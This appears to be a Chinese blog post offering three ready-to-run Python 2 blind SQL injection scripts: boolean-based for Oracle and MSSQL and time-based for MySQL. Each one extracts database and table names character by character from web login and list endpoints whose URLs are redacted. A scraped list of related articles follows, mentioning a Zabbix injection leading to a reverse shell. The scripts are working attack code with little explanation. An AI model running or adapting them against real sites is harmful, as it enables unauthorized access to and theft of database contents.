【实战】SQL注入小脚本
1、ORACLE布尔型盲注
import urllib
import urllib2
import requests
payloads = '_ABCDEFGHIJKLMNOPQRSTUVWXYZ'
header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' }
values={}
print 'Start to retrive database:'
database= ''
#需要先手工判断当前表名长度
for i in range(1, 21):
for payload in payloads:
try:
values['
values['
values['phoneNumber']="' or (select substr(table_name,%s,1) from user_tables where rownum=1)='%s' and '1'='1" % (str(i),str(payload))
data = urllib.urlencode(values)
url = "https://xxx.xxx.xxx.xxx/api/xxx/reg/action/xxx/appUserLogin.json"
req = urllib2.Request(url,data=data,headers=header)
resp = urllib2.urlopen(req).read()
#匹配关键字输出正确的数据库名
if "status" in resp:
database += payload
print 'the database is:'+ database
break
else:
print 'dumping database...'
except Exception,e:
print e
2、MSSQL布尔型盲注
import urllib
import urllib2
import requests
payloads = 'abcdefghijklmnopqrstuvwxyz_'
header = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','Cookie':'ASP.NET_SessionId=4vmyjpbw03vk2aq0q5mlbemy'}
values={}
print 'Start to retrive database:'
user= ''
length=[]
databases=[]
db=''
#注出数据库
def dump_db(i,j):
global db
for n in range(1,j+1):
for payload in payloads:
try:
values['txtMemberName']="xxx%' and (select count(*) from master.dbo.sysdatabases where dbid={0} and substring(name,{1},1)='{2}')=1--".format(i,n,payload)
data = urllib.urlencode(values)
url = "http://xxx.xxx.xxx/HR/xxx/xxx.aspx"
req = urllib2.Request(url,data=data,headers=header)
resp = urllib2.urlopen(req).read()
if "Robert" in resp:
db += payload
print db
if n == j:
databases.append(db)
db=''
break
else:
print 'dumping database...'
except Exception,e:
print e
#遍历判断数据库的长度,需要手工判断数据库个数
for i in range(1,19):
for j in range(1,16):
try:
values['txtMemberName']="xxx%' and (select count(*) from master.dbo.sysdatabases where dbid={0} and len(name)={1})=1--".format(i,j)
data = urllib.urlencode(values)
url = "http://xxx.xxx.xxx/HR/xxx/xxx.aspx"
req = urllib2.Request(url,data=data,headers=header)
#print req
resp = urllib2.urlopen(req).read()
#print resp
if "Robert" in resp:
print 'the length of DB_%s is %s' % (str(i),str(j))
dump_db(i,j)
#print 'the DB is: %s' % str(db)
length.append(j)
break
else:
print 'dumping length...'
except Exception,e:
print e
print '-------------------------'
for ddd in range(0,17):
print databases[ddd]
print '-------------------------'
3、MYSQL基于时间的盲注
import urllib
import urllib2
import time
payloads = 'abcdefghijklmn@_.opqrstuvwxyz0123456789'
header = {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'}
values={}
print 'Start to retrive database:'
database= ''
for i in range(1, 6):
for payload in payloads:
try:
values['pageSize']=10
values['pageNum']=1
values['isAsc']='asc'
values['orderByColumn']="(select*from(select(if(ascii(mid(database(),%s,1))=%s,sleep(2),1)))a)" % (i,ord(payload))
data = urllib.urlencode(values)
url = "https://xxx.xxx.xxx/system/user/list"
t_s = time.time()
request = urllib2.Request(url,data,headers=header)
response = urllib2.urlopen(request,timeout=5)
t_e = time.time()
if((t_e-t_s)>2):
database += payload
print 'the database() is:\t' + database
time.sleep(2.0)
break
else:
print 'dumping......'
except:
pass
【实战】SQL注入小脚本的更多相关文章
- zabbix(sql注入判断脚本)
zabbix(sql注入判断脚本) #-*-coding:utf-8-*- # code by anyun.org import urllib import re def getHtml(url): ...
- Zabbix sql注入漏洞脚本执行反弹shell
exp检测是否存在SQL注入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+------------------------------------ ...
- 实战SQL注入
SQL注入是啥就不解释了.下面演示一个SQL注入的例子 SQL注入点可以自己尝试或用SQL注入漏洞扫描工具去寻找,这里用大名鼎鼎的sqlmap演示一个现成的案例. 1.漏洞试探 root@kali:~ ...
- python打造一个分析网站SQL注入的脚本
前言: 昨天晚上其实就已经写完代码.只不过向FB投稿了,打算延迟一晚上在写博客 所有才到今天早上写.好了,接下来进入正题. 思路: 1.从网站源码中爬取那些类适于:http://xxx.com/xx. ...
- python SQL注入测试脚本(更新中)
import requests import json import warnings warnings.filterwarnings("ignore") url = 'https ...
- sql注入小姿势
利用/*!union*/可以绕过对union的过滤
- SQL注入不简单?那是你没有懂它的原理~
我们真的了解SQL注入吗? 不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动.在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏 ...
- Web安全学习笔记 SQL注入下
Web安全学习笔记 SQL注入下 繁枝插云欣 --ICML8 SQL注入小技巧 CheatSheet 预编译 参考文章 一点心得 一.SQL注入小技巧 1. 宽字节注入 一般程序员用gbk编码做开发的 ...
- MySQL SQL 注入
如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题. 本博文将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符. 所谓SQL注入,就是 ...
随机推荐
- Python3基础 内置函数 hash
Python : 3.7.3 OS : Ubuntu 18.04.2 LTS IDE : pycharm-community-2019.1.3 ...
- Linux记录-shell自动化批量部署sql脚本并记录日志信息(转载)
#!/bin/bash #script_version=v110 db_host=127.0.0.1 db_port=3306 db_username=db_test_inst db_passwd=` ...
- 报错:Connection to node -1 could not be established. Broker may not be available. (org.apache.kafka.clients.NetworkClient)
报错背景: 启动kafka消费者之后出现这种报错,持续打印相同信息. 报错现象: [root@master kafka_2.-]# /opt/kafka/kafka_2.-/bin/kafka-con ...
- Spring Cloud API网关服务 5.2
为什么需要API网关 通过前面内容的学习,我们已经可以构建一个简单的微服务架构系统.这个系统可以使用Spring Boot实现微服务的开发,使用Spring Cloud Eureka实现注册中心以及服 ...
- Cas(03)——Cas Server中各配置文件介绍
Cas Server中各配置文件介绍 Cas Server中所有的配置文件都是放在WEB-INF目录及其子目录下的. 在WEB-INF/classes下的配置文件有: l cas-theme-def ...
- ecshop中常用的sql语句
1.获取单条记录 $row = $GLOBALS['db']->getRow($sql); 2.获取单一字段 $row = $GLOBALS['db']->getOne($sql); 查询 ...
- XML字符串和JAVA对象之间的转化
1.JAXB中相关的注解.类和接口说明 JAXB 中主要的一些注解 - shenyunsese 的专栏 - CSDN 博客 注:教程很全面很详细.但是仅供参考. 主要疑问区分和说明: 1.1 @X ...
- 干货 | 20多门AI网络课程资源(附链接+PDF)
现如今,在火爆的人工智能领域,面临的最窘迫的问题是越来越庞大的产业规模和国家每年约500万的相关人才需求的矛盾.广阔的发展前景.巨大的人才缺口和令人心动的行业薪资,让越来越多的年轻人选择了进入这一行业 ...
- C++ 三大特性 继承(转载)
继承 继承:类的继承,就是新的类从已有类那里得到已有的特性.原有的类称为基类或父类,产生的新类称为派生类或子类. 基本语法 派生类的声明: class 派生类名:继承方式 基类名1, 继承方式 基类名 ...
- 传输json数据到前台的时候,数据中包含日期数据
问题描述 当从数据库中查询的数据中包含有日期格式的数据的时候,数据传输到前台会报错. 解决方式 // 逐条将日期进行格式化后再传输 Date date = new SimpleDateFormat(& ...